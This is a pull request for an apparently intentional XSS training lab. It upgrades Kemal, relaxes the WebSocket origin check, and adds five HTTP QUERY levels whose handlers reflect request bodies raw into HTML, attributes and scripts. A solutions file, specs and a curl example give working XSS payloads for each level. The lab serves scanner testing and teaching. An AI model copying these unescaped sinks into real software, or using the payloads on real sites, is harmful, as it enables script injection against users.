### PR TITLE
feat: adopt Kemal 1.13.0 and add HTTP QUERY mazes

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -186,10 +186,10 @@ The application includes these vulnerability categories:
 ### Dependency Issues
 - If `shards install` fails due to network issues, check internet connectivity
 - Dependency resolution can fail if GitHub is inaccessible
-- The application requires the Kemal framework (version 1.7.3)
+- The application requires the Kemal framework (version 1.13.x)
 
 ### Build Failures
-- Ensure Crystal version matches shard.yml specification (1.8.2)
+- Ensure Crystal version matches shard.yml specification (>= 1.12.0; CI builds on 1.20.x)
 - Build failures often relate to syntax errors in .cr files
 - Production builds are more strict than development builds
 
@@ -265,5 +265,9 @@ When adding new vulnerability scenarios, follow these patterns:
 ### Crystal Language Patterns
 - Use `env.params.query["parameter"]` to access GET parameters
 - Use `env.params.body["parameter"]` for POST parameters  
+- `maze_get` / `maze_post` / `maze_query` (`src/route_helper.cr`) register a
+  route plus its trailing-slash-less alias. `maze_query` is the HTTP QUERY
+  method (RFC 10008, Kemal >= 1.13): body-carrying but GET-shaped, and Kemal
+  answers 400 when such a request has a body and no `Content-Type`.
 - String manipulation: `.gsub("old", "new")` for replacements
 - HTML escaping methods available through Kemal framework

--- a/shard.lock
+++ b/shard.lock
@@ -2,7 +2,7 @@ version: 2.0
 shards:
   ameba:
     git: https://github.com/crystal-ameba/ameba.git
-    version: 1.7.0-dev+git.commit.cdd58b34b0d8a9c785d67183a7a8f07541549e55
+    version: 1.7.1-dev+git.commit.2574477e473e19ef1f82cc82b4a48683b51d3750
 
   backtracer:
     git: https://github.com/sija/backtracer.cr.git
@@ -14,7 +14,7 @@ shards:
 
   kemal:
     git: https://github.com/kemalcr/kemal.git
-    version: 1.12.0
+    version: 1.13.0
 
   radix:
     git: https://github.com/luislavena/radix.git

--- a/shard.yml
+++ b/shard.yml
@@ -11,6 +11,7 @@ targets:
 dependencies:
   kemal:
     github: kemalcr/kemal
+    version: ~> 1.13
 
 development_dependencies:
   spec-kemal:
@@ -19,6 +20,6 @@ development_dependencies:
     github: crystal-ameba/ameba
     branch: master
 
-crystal: 1.8.2
+crystal: ">= 1.12.0"
 
 license: MIT

--- a/solutions/README.md
+++ b/solutions/README.md
@@ -4,7 +4,7 @@ Per-category exploit notes for every endpoint in the lab. The lab itself runs
 `./bin/xssmaze` (default `http://127.0.0.1:3000`); each entry below shows a
 working payload for one or more maze levels.
 
-**Total**: 167 categories · 980 levels.
+**Total**: 175 categories · 1064 levels.
 
 ## How to read an entry
 
@@ -167,6 +167,7 @@ working payload for one or more maze levels.
 | [post](post.md) | Basic POST body reflection (form + JSON). |
 | [postmethod](postmethod.md) | POST method reflection variants (form, JSON, value attr, script string). |
 | [prototype](prototype.md) | JS prototype-pollution gadgets and CMS/framework-style raw reflections. |
+| [querymethod](querymethod.md) | HTTP QUERY (RFC 10008) body reflection: form, JSON, attribute, script string, and a GET-safe/QUERY-vulnerable method confusion. |
 | [racecon](racecon.md) | Reflections in special-tag contents (style, textarea, svg text, title). |
 | [realworld-input](realworld-input.md) | Real-world input vectors: headers, JSON/multipart bodies, redirect sinks, cookies, paths, JSONP. |
 | [realworld](realworld.md) | Real-world reflection patterns: double sinks, debug flags, truncation, headers, encoding chains. |

--- a/solutions/querymethod.md
+++ b/solutions/querymethod.md
@@ -1,0 +1,56 @@
+# querymethod — solutions
+
+HTTP QUERY (RFC 10008) reflection: a safe, idempotent method that carries its
+input in the request body. The GET page on each path is only a browser driver
+(`fetch(..., {method: 'QUERY'})`); the vulnerable request is the QUERY one.
+
+Kemal answers `400` before the handler when a QUERY request has a body but no
+`Content-Type`, so every payload below needs an explicit content type.
+
+```
+curl -X QUERY -H 'Content-Type: application/x-www-form-urlencoded' \
+     --data-urlencode 'query=<script>alert(1)</script>' \
+     http://127.0.0.1:3000/querymethod/level1/
+```
+
+### querymethod-level1
+
+`[QUERY] /querymethod/level1/`
+
+- payload: `<script>alert(1)</script>`
+- body: `query=<script>alert(1)</script>` (Content-Type: application/x-www-form-urlencoded)
+- context: raw body reflection
+
+### querymethod-level2
+
+`[QUERY] /querymethod/level2/`
+
+- payload: `<img src=x onerror=alert(1)>`
+- body: `{"query":"<img src=x onerror=alert(1)>"}` (Content-Type: application/json)
+- context: JSON body reflected raw
+
+### querymethod-level3
+
+`[QUERY] /querymethod/level3/`
+
+- payload: `" onfocus=alert(1) autofocus x="`
+- body: `query=" onfocus=alert(1) autofocus x="` (Content-Type: application/x-www-form-urlencoded)
+- context: reflected in <input value="QUERY"> attribute breakout
+
+### querymethod-level4
+
+`[QUERY] /querymethod/level4/`
+
+- payload: `</script><script>alert(1)</script>`
+- body: `query=</script><script>alert(1)</script>` (Content-Type: application/x-www-form-urlencoded)
+- context: inside <script>var q="QUERY"; close script tag
+
+### querymethod-level5
+
+`[QUERY] /querymethod/level5/`
+
+- payload: `<script>alert(1)</script>`
+- body: `query=<script>alert(1)</script>` (Content-Type: application/x-www-form-urlencoded)
+- context: method confusion — `GET /querymethod/level5/?query=` HTML-escapes and
+  is safe; only the QUERY body reaches the raw sink, so a crawler that treats
+  the endpoint as a plain read finds nothing

--- a/spec/routing_spec.cr
+++ b/spec/routing_spec.cr
@@ -580,3 +580,73 @@ describe "index chrome" do
     response.body.should contain("no-such-maze")
   end
 end
+
+# Kemal 1.13 added the HTTP QUERY method (RFC 10008). spec-kemal only
+# generates helpers for the classic verbs, so drive the handler chain
+# directly the same way they do.
+private def query_request(path : String, body : String,
+                          content_type : String? = "application/x-www-form-urlencoded") : HTTP::Client::Response
+  headers = HTTP::Headers.new
+  headers["Content-Type"] = content_type if content_type
+  SpecKemal.process_request(HTTP::Request.new("QUERY", path, headers, body))
+end
+
+describe "HTTP QUERY mazes" do
+  it "reflects a form-encoded QUERY body raw" do
+    payload = "<script>alert(1)</script>"
+    query_request("/querymethod/level1/", "query=#{URI.encode_www_form(payload)}")
+    response.status_code.should eq 200
+    response.body.should contain(payload)
+  end
+
+  it "reflects a JSON QUERY body raw" do
+    payload = "<img src=x onerror=alert(1)>"
+    query_request("/querymethod/level2/", {query: payload}.to_json, "application/json")
+    response.status_code.should eq 200
+    response.body.should contain(payload)
+  end
+
+  it "serves the trailing-slash-less alias too" do
+    query_request("/querymethod/level1", "query=#{URI.encode_www_form("<b>x</b>")}")
+    response.status_code.should eq 200
+    response.body.should contain("<b>x</b>")
+  end
+
+  it "escapes on GET but reflects raw on QUERY for the method-confusion level" do
+    payload = "<script>alert(1)</script>"
+
+    get "/querymethod/level5/?query=#{URI.encode_www_form(payload)}"
+    response.status_code.should eq 200
+    response.body.should_not contain("GET says: #{payload}")
+
+    query_request("/querymethod/level5/", "query=#{URI.encode_www_form(payload)}")
+    response.status_code.should eq 200
+    response.body.should contain("QUERY says: #{payload}")
+  end
+
+  it "rejects a QUERY body with no Content-Type per RFC 10008" do
+    query_request("/querymethod/level1/", "query=a", nil)
+    response.status_code.should eq 400
+  end
+
+  it "keeps the OpenAPI document free of non-standard path item operations" do
+    get "/map/openapi"
+    doc = JSON.parse(response.body)
+    item = doc["paths"]["/querymethod/level1/"]
+    item.as_h.keys.each do |field|
+      next if field.starts_with?("x-")
+      Xssmaze::Catalog::OPENAPI_METHODS.should contain(field)
+    end
+    item["x-additional-operations"]["QUERY"]["summary"].should eq("querymethod-level1")
+  end
+end
+
+# Kemal >= 1.13 validates the WebSocket Origin against the request Host by
+# default and 403s a client that sends none. This lab is deliberately
+# reachable by non-browser tooling, so the opt-out in `Server.start!` is part
+# of the contract, not an accident.
+describe "websocket origin policy" do
+  it "accepts any WebSocket origin so non-browser clients can reach ws mazes" do
+    Kemal.config.websocket_allowed_origins.should eq(["*"])
+  end
+end

--- a/src/catalog.cr
+++ b/src/catalog.cr
@@ -92,7 +92,7 @@ module Xssmaze::Catalog
       io << "<button class='chip' data-filter='dom' aria-pressed='false'>dom</button>"
       io << "<button class='chip' data-filter='client' aria-pressed='false'>client-only</button>"
       io << "<button class='chip' data-filter='control' aria-pressed='false'>controls</button>"
-      io << "<button class='chip' data-filter='post' aria-pressed='false'>POST</button>"
+      io << "<button class='chip' data-filter='post' aria-pressed='false'>POST/QUERY</button>"
       io << "</div>\n"
       io << "<p class='tally' aria-live='polite'><b id='stat-visible'>" << total
       io << "</b> of " << total << " shown</p>\n"
@@ -159,6 +159,9 @@ module Xssmaze::Catalog
     io << "' data-p='" << maze.vuln
     io << " client" if client
     io << " control" if control
+    # The `post` token predates HTTP QUERY and really means "not a plain GET",
+    # which is what the POST/QUERY chip filters on. Kept as-is so bookmarked
+    # filter state keeps working.
     io << " post" if maze.method != "GET"
     io << "'>"
 
@@ -242,6 +245,12 @@ module Xssmaze::Catalog
     {total: total, categories: arr}.to_json
   end
 
+  # Path Item operations OpenAPI 3.0 actually defines. Anything outside this
+  # set — HTTP QUERY, for one — is not a valid Path Item field, so it goes
+  # into the `x-additional-operations` extension instead of quietly making the
+  # whole document invalid for every consumer.
+  OPENAPI_METHODS = %w[get put post delete options head patch trace]
+
   # Minimal OpenAPI 3.0 document so external tooling (Swagger UI, code
   # generators, scanner runners) can ingest the catalog directly.
   def self.build_openapi(mazes : Array(Maze)) : String
@@ -269,7 +278,13 @@ module Xssmaze::Catalog
         "responses"   => JSON.parse({"200" => {description: "ok"}}.to_json),
       }
       paths[path] ||= Hash(String, Hash(String, JSON::Any)).new
-      paths[path][method] = op
+      if OPENAPI_METHODS.includes?(method)
+        paths[path][method] = op
+      else
+        extra = paths[path]["x-additional-operations"]? || {} of String => JSON::Any
+        extra[maze.method] = JSON.parse(op.to_json)
+        paths[path]["x-additional-operations"] = extra
+      end
     end
 
     {

--- a/src/mazes/query_method_xss.cr
+++ b/src/mazes/query_method_xss.cr
@@ -1,0 +1,127 @@
+# HTTP QUERY (RFC 10008) reflection.
+#
+# QUERY is a GET-shaped method — safe and idempotent — that carries its input
+# in the request *body* instead of the URL. That combination is exactly what a
+# scanner tends to miss: crawlers treat the endpoint as a read, so they probe
+# the query string that isn't there, while body-aware probes only fire on
+# POST/PUT/PATCH. Every level below is reachable by a plain HTTP client; the
+# GET page on the same path is only a browser driver for it.
+#
+# Kemal answers 400 before the handler when a QUERY request carries a body
+# with no `Content-Type`, so each level needs an explicit content type.
+
+# The GET side of every level: a one-field form that sends the value as a
+# QUERY request instead of submitting normally.
+private def query_driver(path : String, title : String, field : String, json : Bool) : String
+  content_type = json ? "application/json" : "application/x-www-form-urlencoded"
+  body = json ? "JSON.stringify({#{field}: v})" : "'#{field}=' + encodeURIComponent(v)"
+
+  "<html><body>
+  <h1>#{title}</h1>
+  <form id='f' onsubmit='send();return false;'>
+  <input type='text' name='#{field}' value='a'><input type='submit' value='send QUERY'>
+  </form>
+  <div id='out'></div>
+  <script>
+    function send() {
+      var v = document.querySelector('input[name=#{field}]').value;
+      fetch('#{path}', {
+        method: 'QUERY',
+        headers: {'Content-Type': '#{content_type}'},
+        body: #{body}
+      }).then(function (r) { return r.text(); })
+        .then(function (t) { document.getElementById('out').innerHTML = t; });
+    }
+  </script>
+  </body></html>"
+end
+
+# Level 1: form-encoded QUERY body reflected raw.
+# Bypass: <script>alert(1)</script>
+Xssmaze.push("querymethod-level1", "/querymethod/level1/", "QUERY form-encoded body param query reflected raw", "QUERY",
+  vuln: "reflected-html", delivery: ["body"],
+  note: "HTTP QUERY (RFC 10008); send the payload as the request body with Content-Type: application/x-www-form-urlencoded")
+maze_get "/querymethod/level1/" do |_|
+  query_driver("/querymethod/level1/", "QUERY Method XSS Level 1", "query", false)
+end
+maze_query "/querymethod/level1/" do |env|
+  query = env.params.body["query"].as(String)
+
+  "<html><body>#{query}</body></html>"
+end
+
+# Level 2: JSON QUERY body reflected raw.
+# Bypass: <script>alert(1)</script>
+Xssmaze.push("querymethod-level2", "/querymethod/level2/", "QUERY JSON body param query reflected raw", "QUERY",
+  vuln: "reflected-html", delivery: ["body"],
+  note: "HTTP QUERY with Content-Type: application/json; payload goes in {\"query\":\"...\"}")
+maze_get "/querymethod/level2/" do |_|
+  query_driver("/querymethod/level2/", "QUERY Method XSS Level 2", "query", true)
+end
+maze_query "/querymethod/level2/" do |env|
+  query = env.params.json["query"].as(String)
+
+  "<html><body>#{query}</body></html>"
+end
+
+# Level 3: QUERY body reflected into an attribute value.
+# Bypass: " onfocus=alert(1) autofocus x="
+Xssmaze.push("querymethod-level3", "/querymethod/level3/", "QUERY body param query reflected in input value", "QUERY",
+  vuln: "reflected-attr", delivery: ["body"],
+  note: "HTTP QUERY; attribute breakout out of <input value=\"...\">")
+maze_get "/querymethod/level3/" do |_|
+  query_driver("/querymethod/level3/", "QUERY Method XSS Level 3", "query", false)
+end
+maze_query "/querymethod/level3/" do |env|
+  query = env.params.body["query"].as(String)
+
+  "<html><body><input type=\"text\" value=\"#{query}\"></body></html>"
+end
+
+# Level 4: QUERY body reflected inside a script string literal.
+# Bypass: </script><script>alert(1)</script>
+Xssmaze.push("querymethod-level4", "/querymethod/level4/", "QUERY body param query reflected in script variable", "QUERY",
+  vuln: "reflected-js", delivery: ["body"],
+  note: "HTTP QUERY; the value lands inside <script>var q = \"...\";</script>")
+maze_get "/querymethod/level4/" do |_|
+  query_driver("/querymethod/level4/", "QUERY Method XSS Level 4", "query", false)
+end
+maze_query "/querymethod/level4/" do |env|
+  query = env.params.body["query"].as(String)
+
+  "<html><body><script>var q = \"#{query}\";</script></body></html>"
+end
+
+# Level 5: method confusion — the same path escapes on GET and reflects raw on
+# QUERY. A scanner that probes `?query=` only sees the safe branch.
+# Bypass: <script>alert(1)</script> in the QUERY body
+Xssmaze.push("querymethod-level5", "/querymethod/level5/?query=a", "same path: GET escaped, QUERY body reflected raw", "QUERY",
+  vuln: "reflected-html", delivery: ["body"],
+  note: "method confusion; GET ?query= is HTML-escaped and safe, only the QUERY body is injectable")
+maze_get "/querymethod/level5/" do |env|
+  query = Xssmaze.html_escape(env.params.query.fetch("query", "a"))
+
+  "<html><body>
+  <p>GET says: #{query}</p>
+  <form id='f' onsubmit='send();return false;'>
+  <input type='text' name='query' value='a'><input type='submit' value='send QUERY'>
+  </form>
+  <div id='out'></div>
+  <script>
+    function send() {
+      var v = document.querySelector('input[name=query]').value;
+      fetch('/querymethod/level5/', {
+        method: 'QUERY',
+        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
+        body: 'query=' + encodeURIComponent(v)
+      }).then(function (r) { return r.text(); })
+        .then(function (t) { document.getElementById('out').innerHTML = t; });
+    }
+  </script>
+  </body></html>"
+end
+maze_query "/querymethod/level5/" do |env|
+  query = env.params.body["query"].as(String)
+
+  "<html><body>QUERY says: #{query}</body></html>"
+end

--- a/src/route_helper.cr
+++ b/src/route_helper.cr
@@ -14,6 +14,16 @@ macro maze_post(path, &block)
   {% end %}
 end
 
+# HTTP QUERY (RFC 10008): a GET-shaped, body-carrying request. Kemal exposes
+# it as its own route DSL from 1.13, and Kemal rejects a QUERY request that
+# has a body but no `Content-Type` with 400 before the handler runs.
+macro maze_query(path, &block)
+  query {{ path }} {{ block }}
+  {% if path.ends_with?("/") %}
+    query {{ path[0...-1] }} {{ block }}
+  {% end %}
+end
+
 module Xssmaze::SecurityHeaders
   def self.apply_overrides(headers : HTTP::Headers, query : HTTP::Params) : Nil
     # Every value is run through `header_value` first: these overrides are a

--- a/src/server.cr
+++ b/src/server.cr
@@ -96,6 +96,14 @@ module Xssmaze::Server
     Kemal.config.host_binding = "127.0.0.1"
     Kemal.config.env = "production" unless ENV["KEMAL_ENV"]?
     Kemal.config.app_name = "XSSMaze"
+    # Kemal >= 1.13 validates the WebSocket `Origin` against the request Host
+    # by default and answers 403 when it is missing. A browser always sends
+    # one, so the maze itself still works — but the non-browser clients this
+    # lab exists for (wscat, custom fuzzers, a raw `curl` upgrade) do not, and
+    # would never reach `/domsource/level7/echo`. The lab is loopback-bound and
+    # vulnerable on purpose, so opt back into allow-all rather than hand
+    # scanners a 403 that has nothing to do with the maze under test.
+    Kemal.config.websocket_allowed_origins = ["*"]
 
     # 2. Own the command line and the console output.
     #


### PR DESCRIPTION
Kemal 1.13.0 lands a batch of security fixes and the HTTP QUERY method. This bumps to it, absorbs the one behaviour change that reaches this lab, and covers the new verb.

## Upgrade

- `shard.lock`: kemal 1.12.0 → 1.13.0.
- `shard.yml`: pins `~> 1.13` and raises the Crystal floor to `>= 1.12.0`, which is what Kemal 1.13 requires. The declared `1.8.2` could no longer build the tree.

## WebSocket Origin

Kemal >= 1.13 validates the WebSocket `Origin` against the request Host and answers 403 when it is missing, so `/domsource/level7/echo` stopped accepting the non-browser clients this lab exists for (wscat, fuzzers, a raw `curl` upgrade). A browser always sends an Origin, so the maze itself still worked — but a scanner got a 403 that had nothing to do with the maze under test. `Server.start!` opts back into allow-all, pinned by a spec.

The rest of the release is either invisible here (development error page — this lab forces `env=production`; `send_file` Range limits — not used) or a straight improvement: malformed JSON bodies now answer 400 instead of 500, and upload temp files are cleaned up however the request ends.

| Kemal 1.13 change | effect here | verified |
|---|---|---|
| WS Origin same-origin by default | `/domsource/level7/echo` 403 without Origin | opted back into `["*"]` |
| Malformed JSON body → 400 | `/post/level2/` 500 → 400 | 400 |
| Upload temp cleanup in `InitHandler` | multipart mazes unaffected, leak fixed | 200 |
| HEAD runs GET filters, `only`/`exclude` scoping | none — `RequestLog` is a plain `HTTP::Handler`, filters are `before_all`/`after_all` | 200 |
| Dev error page escaping, `send_file` ranges | none | n/a |

## HTTP QUERY mazes

QUERY (RFC 10008) is a GET-shaped method that carries its input in the request body — exactly the shape a scanner misses, since crawlers probe the query string that is not there and body-aware probes only fire on POST/PUT/PATCH.

New `querymethod` category, 5 levels: form body raw, JSON body raw, `<input value>` attribute breakout, `<script>` string breakout, and a **method confusion** level whose `GET ?query=` branch is HTML-escaped and safe while only the QUERY body reaches the raw sink. The GET page on each path is just a `fetch(..., {method: 'QUERY'})` driver.

```
curl -X QUERY -H 'Content-Type: application/x-www-form-urlencoded' \
     --data-urlencode 'query=<script>alert(1)</script>' \
     http://127.0.0.1:3000/querymethod/level1/
```

`maze_query` joins `maze_get` / `maze_post` in `src/route_helper.cr`.

## Catalog

`query` is not a valid OpenAPI 3.0 Path Item field, so emitting it would have invalidated `/map/openapi` for every consumer. Non-standard methods now go to the `x-additional-operations` extension. The index filter chip is relabelled **POST/QUERY**; its `post` token always meant "not a plain GET" and keeps that name so bookmarked filter state still works.

Docs: `solutions/querymethod.md`, a row in `solutions/README.md` (totals refreshed to the real 175/1064 — they had drifted to 167/980), and the stale Kemal/Crystal versions in `AGENTS.md`.

## Verification

`crystal build` clean · `crystal spec` **137 examples, 0 failures** (6 new QUERY specs + 1 pinning the WS origin policy) · `crystal tool format --check` clean · ameba 199 files, 0 failures.

Also exercised against a live bind: every catalog endpoint, all 5 QUERY levels, the RFC 400 for a QUERY body with no `Content-Type`, and the WebSocket handshake with and without an `Origin`.